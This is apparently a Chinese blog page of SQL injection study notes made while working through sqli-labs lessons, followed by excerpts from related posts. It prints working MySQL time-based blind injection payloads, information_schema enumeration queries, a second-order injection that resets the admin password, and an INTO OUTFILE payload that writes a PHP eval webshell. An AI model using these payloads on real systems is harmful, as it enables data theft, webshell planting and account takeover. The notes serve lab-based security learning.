sql注入学习笔记4

延时注入,延时注入每种数据库都有不同的延时函数

and If(ascii(substr(database(),1,1))=105,1,sleep(5))--+

这是mysql的延时注入,当ascii(substr(database(),1,1))=105为真时返回1,为假则执行sleep(5),将会有5秒的延时报错

重复执行指定操作的函数

BENCHMARK(count,expr)函数将表达式expr重复执行count次,然后返回执行时间。该函数可以用来判断MySQL处理表达式的速度。

UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE(‘MSG‘,‘by 5 seconds‘)),null)),2,3 FROM (select database() as current) as tb1--+

1 trunc(value,precision)按精度(precision)截取某个数字,不进行舍入操作。
2 round(value,precision)根据给定的精度(precision)输入数值。
3 ceil (value) 产生大于或等于指定值(value)的最小整数。
4 floor(value)与 ceil()相反,产生小于或等于指定值(value)的最小整数。
5 sign(value) 与绝对值函数ABS()相反。ABS()给出的是值的量而不是其符号,sign(value)则给出值的符号而不是量。

这是截断字符串常用函数的详解 http://www.cnblogs.com/lcamry/p/5504374.html

这是盲注一些解释  http://www.cnblogs.com/lcamry/p/5763129.html

Mysql 文件导入导出 http://www.cnblogs.com/lcamry/p/5763111.html

Loadfile常用路径  http://www.cnblogs.com/lcamry/p/5729087.html

UNION SELECT 1,2,‘<?php @eval($_post["mima"])?>‘ into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+

导入一句话木马,前提是有权限,导入后就可以用cknife连接

实验吧的一个实验  :http://jxust.shiyanbar.com/course/50978/vid/1502

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

下列字符受影响:

  • \x00
  • \n
  • \r
  • \
  • "
  • \x1a

获取数据库名

Select schema_name from information_schema.schemata

获取表名

Select table_name from information_schema.tables from where

table_name=’schema_name’

获取列名

Select column_name from information_schema.columns where table_name=’table_name’

获取内容

Select ‘column_name’from schema_name.table_name

Sqlilabs的Less-24关体验了下二次注入

先注册创建了个admin’#的账户,密码是123

可以进行更改密码的操作,更改密码时,将会发生二次注入,因为#将查询更新后面内容注释了

可以看见通过改admin’#用户的密码,结果更改了admin的密码,这时我们就可以通过自己设置的密码登录管理员账户了,还一个和这有同样效果的是sql约束攻击,也能变相登录管理员密码,而不需要原来的管理员密码,当然管理员账户是需要知道的

原文地址:https://www.cnblogs.com/GH-D/p/8278584.html

时间: 2024-08-02 22:20:16

sql注入学习笔记4的相关文章

sql注入学习笔记(1)

把学习到的sql注入的一点知识记录下来 更改默认的sqlmap脱库保存的路径  --output-dir F:\ Substr(字符串,起始位置,字符数)   (初始为1不是0) 这里有示例 https://www.1keydata.com/cn/sql/sql-substring.php 通常配合ascii函数判断出字符的值ascii(substr((select database()),1,1))) > 100 二分法(又叫折半法)可以减少猜测的量 Length()   判断长度 AND (

Sql 注入 学习笔记

以下是MSDN Magazine 里面的一段文章: http://msdn.microsoft.com/zh-cn/magazine/cc163523.aspx 我很好奇这样到底能不能够注入SQL, 所以我建了个 console 程序 static void Main(string[] args) { SqlConnection conn new SqlConnection(); conn.Open(); string commandtext = "exec SetPassword 'admin

SQL注入学习笔记

判断表明(select Count(*) from admin)>=0 exists(select Count(*) from admin) 判断列明exists(select user from admins) and exists(select username from admin)>=0 猜解 判断字段长度 and (select top 1 len(id) from admin)>1 返回正常 猜解每个字节的asc码 and(select top 1 asc(mid(usern

SQL 2005 学习笔记

http://wenku.baidu.com/view/a99b3e8abb68a98271fefaed N 年的 SQL 2005 学习笔记

SQL Database学习笔记

1. linux下快速安装MariaDB: MariaDB 是 一个采用 Maria 存储引擎的  MySQL  分支版本,是由原来 MySQL 的作者 Michael Widenius 创办的公司所开发 的免费开源的数据库服务器 . 本文介绍了在linxu下一个简单的安装 方法(在OpenSuse下测试成功): (摘自:http://www.2cto.com/database/201307/229102.html) # tar zxvf mariadb-5.5.31-linux-x86_64.

SQL注入学习资料总结

转载自:https://bbs.ichunqiu.com/thread-12105-1-1.html  什么是SQL注入 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言.1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准.不过各种通行的数据库系统在其实践过程中都

DVWA 安装使用 &amp; SQL注入学习心得(一)

DVWA 环境搭建和安装简易使用 下载安装phpstudy,这部分不用说了,肯定大家都有,或者安装过.在浏览器输入127.0.0.1,测试一下. 官网下载DVWA http://www.dvwa.co.uk ,解压后放在phpstudy的www目录下. 此时mysql的密码还是空,登录的时候会提示不能空,可以从phpstudy的界面[其他选项菜单]->[My SQL工具]->[重置密码]. 将DVWA/confing下的config.inc.php.dist修改为config.inc.php,

sql注入学习经验

本人是一名渗透新手,信息安全专业的学生一直在学习关于安全方面的理论学习,主要进行的是网站的搭建,但自从接触了web渗透之后才发现自己以前搭建的网站真是漏洞百出,从而也爱上了渗透的学习,今天就和大家分享一下我的学习成果,有什么不好的地方欢迎大家提意见! 今天主要是讲一讲sql注入,sql注入的原理和危害就不多说了,大家百度一下就可以了,给大家讲一讲我的实践经验. sql注入的方法(get参数)     说复杂了没用其实就两种,工具注入与手工注入 (一)选择网站是否能进行sql注入(一般使用火狐浏览

SQL 数据库 学习笔记

虽然学的慢,不过也需要一步一步地学. 学习笔记: 1. SQL语句大小写 不敏感 2. MySQL 需要分号; 3. 用过的命令: show databases: //显示有多少个数据库 create database first_lesson: //创建一个数据库 use first_lesson: //使用这个数据库 show tables: //显示有多少个表 describe person://显示表内的表头内容 insert into person values("dfd",